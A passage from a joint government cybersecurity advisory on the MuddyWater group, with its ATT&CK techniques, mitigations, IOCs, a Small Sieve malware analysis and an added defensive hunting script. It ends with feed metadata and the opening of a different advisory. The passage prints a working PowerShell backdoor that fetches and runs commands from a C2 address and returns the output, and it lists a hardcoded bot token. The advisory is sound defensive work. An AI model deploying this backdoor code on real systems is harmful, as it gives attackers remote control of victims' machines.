The script is lightweight in functionality and uses the `InvokeScript` method to execute whatever the adversary returns. The sample was recovered as a one-liner; it is broken across lines and commented here, with the logic unchanged:

```powershell
# Obfuscation helpers: single-byte XOR of the UTF-8 bytes, then Base64 (and the reverse)
function encode($txt,$key){
    $enByte = [Text.Encoding]::UTF8.GetBytes($txt)
    for($i=0; $i -lt $enByte.count ; $i++){ $enByte[$i] = $enByte[$i] -bxor $key }
    $encodetxt = [Convert]::ToBase64String($enByte)
    return $encodetxt
}
function decode($txt,$key){
    $enByte = [System.Convert]::FromBase64String($txt)
    for($i=0; $i -lt $enByte.count ; $i++){ $enByte[$i] = $enByte[$i] -bxor $key }
    $dtxt = [System.Text.Encoding]::UTF8.GetString($enByte)
    return $dtxt
}
$global:tt = 20   # polling interval in seconds
while($true){
    try{
        # Poll the C2 for tasking, honouring the system proxy so the traffic blends in
        $w = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>')
        $w.proxy = [Net.WebRequest]::GetSystemWebProxy()
        $r = (New-Object System.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd()
        if($r.Length -gt 0){
            # Decode the response with key 2 and run it as PowerShell
            $res = [string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2))
            # Send the output back, encoded with the same key, in a 'cookie' request header
            $wr = [System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=<victim identifier>')
            $wr.proxy = [Net.WebRequest]::GetSystemWebProxy()
            $wr.Headers.Add('cookie',(encode $res 2))
            $wr.GetResponse().GetResponseStream()
        }
    } catch {}
    Start-Sleep -Seconds $global:tt
}
```

### MITRE ATT&CK Techniques

[MuddyWater](<https://attack.mitre.org/groups/G0069/>) uses the ATT&CK techniques listed in table 1.

_Table 1: MuddyWater ATT&CK Techniques[[2](<https://attack.mitre.org/versions/v10/groups/G0069/>)]_

Technique Title | **ID** | **Use**
---|---|---
**Reconnaissance** | |
Gather Victim Identity Information: Email Addresses | [T1589.002](<https://attack.mitre.org/versions/v10/techniques/T1589/002>) | MuddyWater has specifically targeted government agency employees with spearphishing emails.
**Resource Development** | |
Acquire Infrastructure: Web Services | [T1583.006](<https://attack.mitre.org/versions/v10/techniques/T1583/006/>) | MuddyWater has used file sharing services including OneHub to distribute tools.
Obtain Capabilities: Tool | [T1588.002](<https://attack.mitre.org/versions/v10/techniques/T1588/002>) | MuddyWater has made use of the legitimate tools ConnectWise and RemoteUtilities for access to target environments.
**Initial Access** | |
Phishing: Spearphishing Attachment | [T1566.001](<https://attack.mitre.org/versions/v10/techniques/T1566/001>) | MuddyWater has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments.
Phishing: Spearphishing Link | [T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>) | MuddyWater has sent targeted spearphishing emails with malicious links.
**Execution** | |
Windows Management Instrumentation | [T1047](<https://attack.mitre.org/versions/v10/techniques/T1047>) | MuddyWater has used malware that leveraged Windows Management Instrumentation for execution and querying host information.
Command and Scripting Interpreter: PowerShell | [T1059.001](<https://attack.mitre.org/versions/v10/techniques/T1059/001/>) | MuddyWater has used PowerShell for execution.
Command and Scripting Interpreter: Windows Command Shell | [T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>) | MuddyWater has used a custom tool for creating reverse shells.
Command and Scripting Interpreter: Visual Basic | [T1059.005](<https://attack.mitre.org/versions/v10/techniques/T1059/005>) | MuddyWater has used Visual Basic Script (VBS) files to execute its POWERSTATS payload, as well as macros.
Command and Scripting Interpreter: Python | [T1059.006](<https://attack.mitre.org/versions/v10/techniques/T1059/006>) | MuddyWater has used tools developed in Python, including Out1.
Command and Scripting Interpreter: JavaScript | [T1059.007](<https://attack.mitre.org/versions/v10/techniques/T1059/007>) | MuddyWater has used JavaScript files to execute its POWERSTATS payload.
Exploitation for Client Execution | [T1203](<https://attack.mitre.org/versions/v10/techniques/T1203>) | MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.
User Execution: Malicious Link | [T1204.001](<https://attack.mitre.org/versions/v10/techniques/T1204/001>) | MuddyWater has distributed URLs in phishing emails that link to lure documents.
User Execution: Malicious File | [T1204.002](<https://attack.mitre.org/versions/v10/techniques/T1204/002>) | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.
Inter-Process Communication: Component Object Model | [T1559.001](<https://attack.mitre.org/versions/v10/techniques/T1559/001>) | MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
Inter-Process Communication: Dynamic Data Exchange | [T1559.002](<https://attack.mitre.org/versions/v10/techniques/T1559/002>) | MuddyWater has used malware that can execute PowerShell scripts via Dynamic Data Exchange.
**Persistence** | |
Scheduled Task/Job: Scheduled Task | [T1053.005](<https://attack.mitre.org/versions/v10/techniques/T1053/005>) | MuddyWater has used scheduled tasks to establish persistence.
Office Application Startup: Office Template Macros | [T1137.001](<https://attack.mitre.org/versions/v10/techniques/T1137/001>) | MuddyWater has used a Word template, `Normal.dotm`, for persistence.
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | [T1547.001](<https://attack.mitre.org/versions/v10/techniques/T1547/001/>) | MuddyWater has added the Registry Run key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding` to establish persistence.
**Privilege Escalation** | |
Abuse Elevation Control Mechanism: Bypass User Account Control | [T1548.002](<https://attack.mitre.org/versions/v10/techniques/T1548/002/>) | MuddyWater uses various techniques to bypass User Account Control.
Credentials from Password Stores | [T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>) | MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.
Credentials from Password Stores: Credentials from Web Browsers | [T1555.003](<https://attack.mitre.org/versions/v10/techniques/T1555/003>) | MuddyWater has run tools including Browser64 to steal passwords saved in victim web browsers.
**Defense Evasion** | |
Obfuscated Files or Information | [T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>) | MuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and obfuscated PowerShell scripts. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.
Obfuscated Files or Information: Steganography | [T1027.003](<https://attack.mitre.org/versions/v10/techniques/T1027/003>) | MuddyWater has stored obfuscated JavaScript code in an image file named `temp.jpg`.
Obfuscated Files or Information: Compile After Delivery | [T1027.004](<https://attack.mitre.org/versions/v10/techniques/T1027/004>) | MuddyWater has used the .NET `csc.exe` tool to compile executables from downloaded C# code.
Masquerading: Match Legitimate Name or Location | [T1036.005](<https://attack.mitre.org/versions/v10/techniques/T1036/005>) | MuddyWater has disguised malicious executables and used filenames and Registry key names associated with Windows Defender. For example, Small Sieve uses variations of Microsoft ("Microsift") and Outlook in its filenames to avoid detection during casual inspection.
Deobfuscate/Decode Files or Information | [T1140](<https://attack.mitre.org/versions/v10/techniques/T1140>) | MuddyWater decoded Base64-encoded PowerShell commands using a VBS file.
Signed Binary Proxy Execution: CMSTP | [T1218.003](<https://attack.mitre.org/versions/v10/techniques/T1218/003>) | MuddyWater has used `CMSTP.exe` and a malicious `.INF` file to execute its POWERSTATS payload.
Signed Binary Proxy Execution: Mshta | [T1218.005](<https://attack.mitre.org/versions/v10/techniques/T1218/005>) | MuddyWater has used `mshta.exe` to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.
Signed Binary Proxy Execution: Rundll32 | [T1218.011](<https://attack.mitre.org/versions/v10/techniques/T1218/011>) | MuddyWater has used malware that leveraged `rundll32.exe` in a Registry Run key to execute a `.dll`.
Execution Guardrails | [T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>) | The Small Sieve payload used by MuddyWater will only execute correctly if the word “Platypus” is passed to it on the command line.
Impair Defenses: Disable or Modify Tools | [T1562.001](<https://attack.mitre.org/versions/v10/techniques/T1562/001>) | MuddyWater can disable the system's local proxy settings.
**Credential Access** | |
OS Credential Dumping: LSASS Memory | [T1003.001](<https://attack.mitre.org/versions/v10/techniques/T1003/001>) | MuddyWater has performed credential dumping with Mimikatz and `procdump64.exe`.
OS Credential Dumping: LSA Secrets | [T1003.004](<https://attack.mitre.org/versions/v10/techniques/T1003/004>) | MuddyWater has performed credential dumping with LaZagne.
OS Credential Dumping: Cached Domain Credentials | [T1003.005](<https://attack.mitre.org/versions/v10/techniques/T1003/005>) | MuddyWater has performed credential dumping with LaZagne.
Unsecured Credentials: Credentials In Files | [T1552.001](<https://attack.mitre.org/versions/v10/techniques/T1552/001>) | MuddyWater has run a tool that steals passwords saved in victim email.
**Discovery** | |
System Network Configuration Discovery | [T1016](<https://attack.mitre.org/versions/v10/techniques/T1016>) | MuddyWater has used malware to collect the victim’s IP address and domain name.
System Owner/User Discovery | [T1033](<https://attack.mitre.org/versions/v10/techniques/T1033>) | MuddyWater has used malware that can collect the victim’s username.
System Network Connections Discovery | [T1049](<https://attack.mitre.org/versions/v10/techniques/T1049>) | MuddyWater has used a PowerShell backdoor to check for Skype connections on the target machine.
Process Discovery | [T1057](<https://attack.mitre.org/versions/v10/techniques/T1057>) | MuddyWater has used malware to obtain a list of running processes on the system.
System Information Discovery | [T1082](<https://attack.mitre.org/versions/v10/techniques/T1082>) | MuddyWater has used malware that can collect the victim’s OS version and machine name.
File and Directory Discovery | [T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>) | MuddyWater has used malware that checked whether the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."
Account Discovery: Domain Account | [T1087.002](<https://attack.mitre.org/versions/v10/techniques/T1087/002/>) | MuddyWater has used `cmd.exe` with `net user /domain` to enumerate domain users.
Software Discovery | [T1518](<https://attack.mitre.org/versions/v10/techniques/T1518>) | MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.
Security Software Discovery | [T1518.001](<https://attack.mitre.org/versions/v10/techniques/T1518/001>) | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.
**Collection** | |
Screen Capture | [T1113](<https://attack.mitre.org/versions/v10/techniques/T1113>) | MuddyWater has used malware that can capture screenshots of the victim’s machine.
Archive Collected Data: Archive via Utility | [T1560.001](<https://attack.mitre.org/versions/v10/techniques/T1560/001/>) | MuddyWater has used the native Windows cabinet creation tool, `makecab.exe`, likely to compress stolen data to be uploaded.
**Command and Control** | |
Application Layer Protocol: Web Protocols | [T1071.001](<https://attack.mitre.org/versions/v10/techniques/T1071/001/>) | MuddyWater has used HTTP for C2 communications; for example, Small Sieve beacons and tasking are performed using the Telegram API over HTTPS.
Proxy: External Proxy | [T1090.002](<https://attack.mitre.org/versions/v10/techniques/T1090/002>) | MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location. MuddyWater has also used a series of compromised websites that victims connected to randomly to relay information to C2.
Web Service: Bidirectional Communication | [T1102.002](<https://attack.mitre.org/versions/v10/techniques/T1102/002>) | MuddyWater has used web services including OneHub to distribute remote access tools.
Multi-Stage Channels | [T1104](<https://attack.mitre.org/versions/v10/techniques/T1104>) | MuddyWater has used one C2 to obtain enumeration scripts and monitor web logs, but a different C2 to send data back.
Ingress Tool Transfer | [T1105](<https://attack.mitre.org/versions/v10/techniques/T1105>) | MuddyWater has used malware that can upload additional files to the victim’s machine.
Data Encoding: Standard Encoding | [T1132.001](<https://attack.mitre.org/versions/v10/techniques/T1132/001/>) | MuddyWater has used tools to encode C2 communications, including Base64 encoding.
Data Encoding: Non-Standard Encoding | [T1132.002](<https://attack.mitre.org/versions/v10/techniques/T1132/002/>) | MuddyWater uses tools such as Small Sieve, which employs a custom hex byte swapping encoding scheme to obfuscate tasking traffic.
Remote Access Software | [T1219](<https://attack.mitre.org/versions/v10/techniques/T1219>) | MuddyWater has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.
**Exfiltration** | |
Exfiltration Over C2 Channel | [T1041](<https://attack.mitre.org/versions/v10/techniques/T1041>) | MuddyWater has used C2 infrastructure to receive exfiltrated data.

### Mitigations

#### Protective Controls and Architecture

 * **Deploy application control software to limit the applications and executable code that can be run by users.** Email attachments and files downloaded via links in emails often contain executable code.

#### Identity and Access Management

 * **Use multifactor authentication where possible,** particularly for webmail, virtual private networks, and accounts that access critical systems.
 * **Limit the use of administrator privileges.** Users who browse the internet, use email, and execute code with administrator privileges make for excellent spearphishing targets, because their system, once infected, enables attackers to move laterally across the network, gain additional accesses, and access highly sensitive information.

#### Phishing Protection

 * **Enable antivirus and anti-malware software and update signature definitions in a timely manner.** Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing.
 * **Be suspicious of unsolicited contact via email or social media from any individual you do not know personally.** Do not click on hyperlinks or open attachments in these communications.
 * **Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.**
 * **Train users through awareness and simulations to recognize and report phishing and social engineering attempts.** Identify and suspend access of user accounts exhibiting unusual activity.
 * **Adopt threat reputation services at the network device, operating system, application, and email service levels.** Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks.

#### Vulnerability and Configuration Management

 * **Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.** Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).

### Additional Resources

 * For more information on Iranian government-sponsored malicious cyber activity, see [CISA's webpage – Iran Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/iran>) and [CNMF's press release – Iranian intel cyber suite of malware uses open source tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>).
 * For information and resources on protecting against and responding to ransomware, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), a centralized, whole-of-government webpage providing ransomware resources and alerts.
 * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States, [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
 * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats, including ransomware. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate attack vectors.
 * The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/rewards/foreign-malicious-cyber-activity-against-u-s-critical-infrastructure/>) website for more information and how to report information securely.

### References

[[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>)

[[2] MITRE ATT&CK: MuddyWater](<https://attack.mitre.org/versions/v10/groups/G0069/>)

### Caveats

The information you have accessed or received is being provided “as is” for informational purposes only.
The FBI, CISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or NSA.

### Purpose

This document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA agrees with this attribution and the details provided in this report.

### Appendix A: IOCs

The following IP addresses are associated with MuddyWater activity (defanged with `[.]`; refang them before loading into a blocklist or SIEM watchlist):

```
5.199.133[.]149
45.142.213[.]17
45.142.212[.]61
45.153.231[.]104
46.166.129[.]159
80.85.158[.]49
87.236.212[.]22
88.119.170[.]124
88.119.171[.]213
89.163.252[.]232
95.181.161[.]49
95.181.161[.]50
164.132.237[.]65
185.25.51[.]108
185.45.192[.]228
185.117.75[.]34
185.118.164[.]21
185.141.27[.]143
185.141.27[.]248
185.183.96[.]7
185.183.96[.]44
192.210.191[.]188
192.210.226[.]128
```

### Appendix B: Small Sieve

**Note:** the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.

#### **Metadata**

_Table 2: gram_app.exe Metadata_

Filename | gram_app.exe
---|---
**Description** | NSIS installer that installs and runs the index.exe backdoor and adds a persistence Registry key
**Size** | 16999598 bytes
**MD5** | 15fa3b32539d7453a9a85958b77d4c95
**SHA-1** | 11d594f3b3cf8525682f6214acb7b7782056d282
**SHA-256** | b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054
**Compile Time** | 2021-09-25 21:57:46 UTC

_Table 3: index.exe Metadata_

Filename | index.exe
---|---
**Description** | The final PyInstaller-bundled Python 3.9 backdoor
**Size** | 17263089 bytes
**MD5** | 5763530f25ed0ec08fb26a30c04009f1
**SHA-1** | 2a6ddf89a8366a262b56a251b00aafaed5321992
**SHA-256** | bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2
**Compile Time** | 2021-08-01 04:39:46 UTC

#### **Functionality**

##### **_Installation_**

Small Sieve is distributed as a large (16 MB) NSIS installer named `gram_app.exe`, which does not appear to masquerade as a legitimate application. Once executed, the backdoor binary `index.exe` is installed in the user’s `AppData\Roaming` directory and is added as a Run key in the Registry to enable persistence after reboot.

The installer then executes the backdoor with the “Platypus” argument [[T1480](<https://attack.mitre.org/versions/v10/techniques/T1480/>)], which is also present in the Registry persistence key: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift`.

##### **_Configuration_**

The backdoor attempts to restore previously initialized session data from `%LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt`.

If this file does not exist, it uses the hardcoded values listed in table 4:

_Table 4: Credentials and Session Values_

Field | **Value** | **Description**
---|---|---
Chat ID | 2090761833 | This is the Telegram channel ID that beacons are sent to and from which tasking requests are received. Tasking requests are dropped if they do not come from this channel. This value cannot be changed.
Bot ID | Random value between 10,000,000 and 90,000,000 | This is a bot identifier generated at startup that is sent to the C2 in the initial beacon. Commands must be prefixed with `/com[Bot ID]` in order to be processed by the malware.
Telegram Token | 2003026094:AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY | This is the initial token used to authenticate each message to the Telegram Bot API.
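As an added example, not part of the advisory, the following Python turns the Appendix A list and the Small Sieve persistence artefacts described above into a small hunt: it refangs the `[.]`-defanged addresses, matches them against proxy log lines (also flagging Telegram Bot API traffic, which is Small Sieve's tasking channel and is rarely legitimate from a managed workstation), and checks `HKCU\...\Run` entries for the `OutlookMicrosift` value name, the `index.exe` path under `AppData\Roaming` (the `OutlookMicrosift` folder name comes from the Detection table later in this appendix) and the "Platypus" guardrail argument. The log format, the log lines and the Run-key entries are constructed for the demonstration; only the indicator values come from the advisory.

```python
"""Hunt for Appendix A network IOCs and Small Sieve persistence artefacts.

Added example, not code from the advisory. Indicator values are the ones
published above; the log format, log lines and Run-key entries are constructed
for the demonstration.
"""
import ipaddress
import re

# Subset of the Appendix A list, exactly as published (defanged with "[.]").
DEFANGED_IOCS = """
5.199.133[.]149
45.142.213[.]17
88.119.170[.]124
95.181.161[.]49
95.181.161[.]50
185.117.75[.]34
"""

# Small Sieve host artefacts from the Installation/Configuration sections.
RUN_VALUE_NAME = "OutlookMicrosift"
GUARDRAIL_ARG = "Platypus"
INSTALL_PATH_RE = re.compile(r"\\OutlookMicrosift\\index\.exe", re.IGNORECASE)

# Constructed proxy log format: timestamp client destination-host method url
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<dest>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def refang(text: str) -> set:
    """Convert '1.2.3[.]4'-style indicators into validated IP address strings."""
    found = set()
    for token in text.split():
        try:
            found.add(str(ipaddress.ip_address(token.replace("[.]", "."))))
        except ValueError:
            continue  # not an address (comment, stray word, typo): skip it
    return found


def scan_proxy_log(lines, iocs: set) -> list:
    """Return (line, reason) pairs for lines that hit an IOC or the Telegram Bot API."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        dest, url = m["dest"], m["url"]
        if dest in iocs:
            hits.append((line, f"destination {dest} is in the MuddyWater IOC list"))
        elif dest == "api.telegram.org" and "/bot" in url:
            hits.append((line, "Telegram Bot API traffic (Small Sieve tasking channel)"))
    return hits


def scan_run_keys(entries) -> list:
    """entries: (value_name, command) pairs read from HKCU\\...\\CurrentVersion\\Run.

    Each indicator is checked independently so a renamed value or a moved
    binary still trips at least one of them.
    """
    hits = []
    for name, command in entries:
        reasons = []
        if name.lower() == RUN_VALUE_NAME.lower():
            reasons.append("Run value name matches the Small Sieve persistence key")
        if INSTALL_PATH_RE.search(command):
            reasons.append("command points at %AppData%\\OutlookMicrosift\\index.exe")
        if GUARDRAIL_ARG in command.split():
            reasons.append('command carries the "Platypus" execution guardrail')
        if reasons:
            hits.append((name, command, reasons))
    return hits


# Constructed samples: one beacon to a listed C2, one Telegram Bot API poll,
# one benign request, one benign Run entry and one Small Sieve Run entry.
SAMPLE_PROXY_LOG = [
    "2022-02-21T09:14:02Z 10.0.5.23 95.181.161.49 GET http://95.181.161.49/index.php?id=a1b2c3",
    "2022-02-21T09:14:30Z 10.0.5.23 api.telegram.org GET https://api.telegram.org/bot0000000000:EXAMPLE/getUpdates",
    "2022-02-21T09:15:00Z 10.0.5.40 www.example.com GET https://www.example.com/",
]
SAMPLE_RUN_KEYS = [
    ("OneDrive", r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("OutlookMicrosift", r'"C:\Users\jdoe\AppData\Roaming\OutlookMicrosift\index.exe" Platypus'),
]


def hunt() -> dict:
    """Run both checks over the constructed samples and return the findings."""
    iocs = refang(DEFANGED_IOCS)
    return {
        "ioc_count": len(iocs),
        "network": scan_proxy_log(SAMPLE_PROXY_LOG, iocs),
        "host": scan_run_keys(SAMPLE_RUN_KEYS),
    }


if __name__ == "__main__":
    findings = hunt()
    print(f"loaded {findings['ioc_count']} IOC addresses")
    for line, reason in findings["network"]:
        print(f"[net]  {reason}\n       {line}")
    for name, command, reasons in findings["host"]:
        print(f"[host] Run\\{name}: {'; '.join(reasons)}\n       {command}")
```

In practice, paste the complete Appendix A list into `DEFANGED_IOCS`, replace the sample lists with your proxy export and a `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` dump per user, and treat the Telegram check as a lead to triage rather than a verdict, since some organisations do run legitimate Telegram bots.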

#### **Tasking**

Small Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the host’s IP address, as described in the Communications (Beacon Format) section below. It then waits for tasking as a Telegram bot using the **python-telegram-bot** module.

Two task formats are supported:

 * `/start` – no argument is passed; this causes the beacon information to be repeated.
 * `/com[BotID] [command]` – for issuing commands passed in the argument.

The following commands are supported by the second of these formats, as described in table 5:

_Table 5: Supported Commands_

Command | Description
---|---
`delete` | This command causes the backdoor to exit; it does not remove persistence.
`download url""filename` | The URL will be fetched and saved to the provided filename using the Python urllib module `urlretrieve` function.
`change token""newtoken` | The backdoor will reconnect to the Telegram Bot API using the provided token `newtoken`. This updated token will be stored in the encoded `MicrosoftWindowsOutlookDataPlus.txt` file.
`disconnect` | The original connection to Telegram is terminated. It is likely used after a `change token` command is issued.

Any commands other than those detailed in table 5 are executed directly by passing them to `cmd.exe /c`, and the output is returned as a reply.

#### **Defense Evasion**

##### **_Anti-Sandbox_**

_Figure 1: Execution Guardrail_ (image not reproduced here)

Threat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line.

##### **_String obfuscation_**

Internal strings and new Telegram tokens are stored obfuscated with a custom alphabet and Base64-encoded. A decryption script is included at the end of this appendix (Figure 4).

#### **Communications**

##### **_Beacon Format_**

Before listening for tasking using CommandHandler objects from the `python-telegram-bot` module, a beacon is generated manually using the standard `requests` library:

_Figure 2: Manually Generated Beacon_ (image not reproduced here)

The hex host data is encoded using the byte shuffling algorithm described in the “Communications (Traffic obfuscation)” section of this report. The example in figure 2 decodes to:

`admin/WINDOMAIN1 | 10.17.32.18`

##### _**Traffic obfuscation**_

Although traffic to the Telegram Bot API is protected by TLS, Small Sieve obfuscates its tasking and response using a hex byte shuffling algorithm. A Python3 implementation is shown in figure 3.

_Figure 3: Traffic Encoding Scheme Based on Hex Conversion and Shuffling_ (image not reproduced here)

#### **Detection**

Table 6 outlines indicators of compromise.

_Table 6: Indicators of Compromise_

Type | Description | **Values**
---|---|---
Path | Telegram session persistence file (obfuscated) | `%LocalAppData%\MicrosoftWindowsOutlookDataPlus.txt`
Path | Installation path of the Small Sieve binary | `%AppData%\OutlookMicrosift\index.exe`
Registry value name | Persistence Registry key pointing to index.exe with a “Platypus” argument | `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift`

#### **String Recovery Script**

_Figure 4: String Recovery Script_ (image not reproduced here)

### Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field-offices](<https://www.fbi.gov/contact-us/field-offices>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>). For NSA client requirements or general cybersecurity inquiries, contact the Cybersecurity Requirements Center at [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). United Kingdom organizations should report a significant cyber security incident at [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973.

### Revisions

February 24, 2022: Initial Version
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T12:00:00", "type": "ics", "title": "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2022-02-24T12:00:00", "id": "AA22-055A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. 
This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. 
